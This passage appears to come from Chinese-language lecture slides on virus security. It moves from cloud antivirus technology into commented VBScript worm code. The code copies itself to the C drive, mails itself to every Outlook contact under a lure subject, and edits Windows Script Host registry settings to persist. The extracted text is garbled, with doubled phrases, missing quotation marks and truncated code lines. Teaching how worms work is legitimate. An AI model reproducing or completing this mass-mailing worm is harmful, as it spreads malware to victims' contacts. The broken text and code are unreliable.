46、是网络时代信息安全的最新体现，它融合了并行技术是网络时代信息安全的最新体现，它融合了并行 处理、网格计算、未知病毒行为判断等新兴技术和概念，通过网处理、网格计算、未知病毒行为判断等新兴技术和概念，通过网 状的大量客户端对网络中软件行为的异常监测，获取互联网中木状的大量客户端对网络中软件行为的异常监测，获取互联网中木 马、恶意程序的最新信息，发送到服务端进行自动分析和处理，马、恶意程序的最新信息，发送到服务端进行自动分析和处理， 然后再把病毒和木马的解决方案分发到每一个客户端。然后再把病毒和木马的解决方案分发到每一个客户端。 l云安全技术应用后，识别和查杀病毒不再仅仅依靠本地硬盘中的云安全技术应

47、用后，识别和查杀病毒不再仅仅依靠本地硬盘中的 病毒库，而是依靠庞大的网络服务，实时进行采集、分析以及处病毒库，而是依靠庞大的网络服务，实时进行采集、分析以及处 理。整个互联网就是一个巨大的理。整个互联网就是一个巨大的“杀毒软件杀毒软件”，参与者越多，每，参与者越多，每 个参与者就越安全，整个互联网就会更安全。以金山毒霸为例，个参与者就越安全，整个互联网就会更安全。以金山毒霸为例， “依托于云安全技术，金山毒霸依托于云安全技术，金山毒霸2009病毒库病毒样本数量增加了病毒库病毒样本数量增加了 5倍、日最大病毒处理能力提高了倍、日最大病毒处理能力提高了100倍、紧急病毒响应时间缩短倍、紧急病毒响应

48、时间缩短 到到1小时以内。小时以内。”可以说云安全开创了计算机安全可以说云安全开创了计算机安全2.0时代。时代。 蠕虫病毒自我复制的部分代码蠕虫病毒自我复制的部分代码 创建一个文件对象创建一个文件对象 Set objFs = CreateObject(Scripting.) 通过文件系统对象的方法创建一个通过文件系统对象的方法创建一个TXT方法方法 objFs.CreateTextFile c:virus.txt, 1 将上述代码保存为将上述代码保存为.vbs的的VB脚本文件，执行后将在脚本文件，执行后将在C盘中创建一个盘中创建一个TXT 文件。文件。执行代码执行代码 如将第二条语句改为：如将

49、第二条语句改为： objFs.Get).Copy(“c:virus.vbs”) 就可以实现将自身复制到就可以实现将自身复制到C盘盘virus.bat文件文件 执行代码执行代码 蠕虫病毒传播的部分代码蠕虫病毒传播的部分代码 创建一个创建一个OUTLOOK应用的对象应用的对象 Set objOA=Wscript.CreateObject(Outlook.Application) 取得取得MAPI名字空间名字空间 Set objMapi=objOA.GetNameSpace (MAPI) 遍历地址簿遍历地址簿 For i=1 to objMapi.AddressLists.Count Set obj

50、AddList=objMapi.AddressLists (i) For j=1 To objAddList. AddressEntries.Count Set objMail=objOA.CreateItem (0) 取得收件人邮件地址取得收件人邮件地址 objMail.Recipients.Add (objAddList. AddressEntries (j) 设置邮件主题设置邮件主题,这个往往具有很大的诱惑性质这个往往具有很大的诱惑性质 objMail.Subject=你好你好! 蠕虫病毒传播的部分代码蠕虫病毒传播的部分代码 设置信件内容设置信件内容 objMail.Body=这次给你的

51、附件这次给你的附件,是我的新文档！是我的新文档！ 把自己作为附件扩散出去把自己作为附件扩散出去 objMail.Attachments.Add (c:virus.vbs) 发送邮件发送邮件 objMail.Sen Next Next 清空清空objMapi变量变量,释放资源释放资源 Set objMapi=Nothing 清空清空objOA变量变量 set objOA=Nothing 蠕虫病毒潜伏的部分代码蠕虫病毒潜伏的部分代码 容错语句，避免程序崩溃容错语句，避免程序崩溃 On Error Resume Next dim wscr, rr 创建创建WScript.Shell对象对象 set wscr=CreateObject(WScript.Shell) 读入注册表中的超时键值读入注册表中的超时键值 rr=wscr.Regread(HKEY_CURRENT_USERSoftwareMicrosoftWin dows Script HostSettingsTimeout) if(rr=1) then 超时设置超时设置 wscr.RegWrite HKEY_CURRENT_USERSoftwareMicrosoftWindows Scrip